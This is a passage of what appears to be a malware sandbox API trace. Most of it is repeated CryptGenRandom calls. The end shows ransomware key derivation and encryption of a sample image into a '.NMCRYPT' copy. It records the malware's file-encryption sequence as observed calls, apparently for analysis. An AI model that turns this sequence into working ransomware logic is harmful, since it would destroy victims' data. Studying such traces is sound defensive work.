pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.831] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.834] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.834] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.835] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x60d22c | out: phHash=0x60d22c) returned 1 [0164.835] CryptHashData (hHash=0x9ad578, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.835] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x60d230 | out: phKey=0x60d230*=0x9ad378) returned 1 [0164.835] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0164.835] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0164.835] wcslen (_String="\\\\?\\") returned 0x4 [0164.835] CryptDuplicateKey (in: hKey=0x9ad378, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad478) returned 1 [0164.835] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a4 [0164.835] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0164.836] GetFileSizeEx (in: hFile=0x690, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=5115) returned 1 [0164.836] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0164.837] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.838] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.838] GetLastError () returned 0x0 [0164.838] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.839] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.839] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.839] GetLastError () returned 0x0 [0164.839] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.839] 